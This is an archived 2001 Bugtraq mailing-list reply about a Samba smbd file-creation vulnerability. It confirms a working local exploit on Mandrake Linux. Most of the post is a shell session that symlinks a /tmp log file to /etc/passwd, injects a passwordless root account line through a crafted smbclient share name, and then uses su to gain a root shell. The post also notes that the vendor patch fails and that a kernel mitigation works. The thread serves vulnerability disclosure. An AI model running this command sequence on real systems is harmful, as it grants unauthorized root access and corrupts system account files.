Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: smbd remote file creation vulnerability
From: Pavol Luptak <wilder () hq alert sk>
Date: Mon, 25 Jun 2001 19:09:19 +0200

On Mon, Jun 25, 2001 at 12:14:02AM +0200, maniac () localhost sk wrote:

Hi,

Mandrake 7.1 (Mandrake 8.0 and RedHat6.2) defaultly logs here:
/var/log/samba/log.%m

I replaced it with /var/log/samba/%m.log and used your exploit, which
worked - into /etc/passwd was appended also line:
  toor::0:0::/:/bin/sh

But until there was that two spaces onto begining of line, it was
impossible to su to that account, this is error message:

Jun 24 23:28:55 localhost PAM_pwdb[23844]: check pass; user unknown

I tried to insert \r after the first \n, but unsucessfully. 
I'm using pam-0.72-7mdk.

This versions of PAM also don't permit spaces on begining of line:
pam-0.72-20.6.x (Redhat6.2)
pam-0.74-6mdk (Mandrake8.0(

Maybe sshd without PAM support and permitting empty password may be
'vulnerable' on such systems.

[wilder () lysurus wilder]$ cat /etc/redhat-release 
Linux Mandrake release 8.0 (Traktopel) for i586
[wilder () lysurus wilder]$ rpm -q pam
pam-0.74-6mdk
[wilder () lysurus wilder]$ egrep "log file" /etc/smb.conf
# this tells Samba to use a separate log file for each machine
   log file = /var/log/samba/%m.log      (= changed from default log.%m)
# Put a capping on the size of the log files (in Kb).
[wilder () lysurus wilder]$ rpm -qf /usr/sbin/smbd
samba-2.0.9-1.3mdk
[wilder () lysurus wilder]$ ln -s /etc/passwd /tmp/x.log
[wilder () lysurus wilder]$ smbclient //localhost/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" -n ../../../tmp/x -N
added interface ip=10.0.0.43 bcast=10.0.0.255 nmask=255.255.255.0
Anonymous login successful
Domain=[UI42] OS=[Unix] Server=[Samba 2.0.9]
[wilder () lysurus wilder]$ tail /etc/passwd
..
..
[2001/06/25 18:46:48, 1] smbd/reply.c:reply_sesssetup_and_X(927)
  Rejecting user 'wilder': authentication failed
[2001/06/25 18:46:48, 0] smbd/service.c:make_connection(213)
  ../../../tmp/x (127.0.0.1) couldn't find service 
  toor::0:0::/:/bin/sh
[wilder () lysurus wilder]$ su toor
[root () lysurus wilder]#

Appending to /etc/passwd has nothing to do with pam.

Mandrake security fix of samba-2.0.9-1.3mdk does not solve this security
problem. This exploit works with samba 2.0.8 without problems, too.

Linux kernels with openwall patch (with restricted links in /tmp) are
imunne to this type of attack (following symlinks does not work, link
owner does not match with file's owner).

Cheers,

Pavol
-- 
_______________________________________________________________________
[wilder () hq alert sk] [http://hq.alert.sk/~wilder] [talker: ttt.sk 5678] 

Attachment: _bin
Description:


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]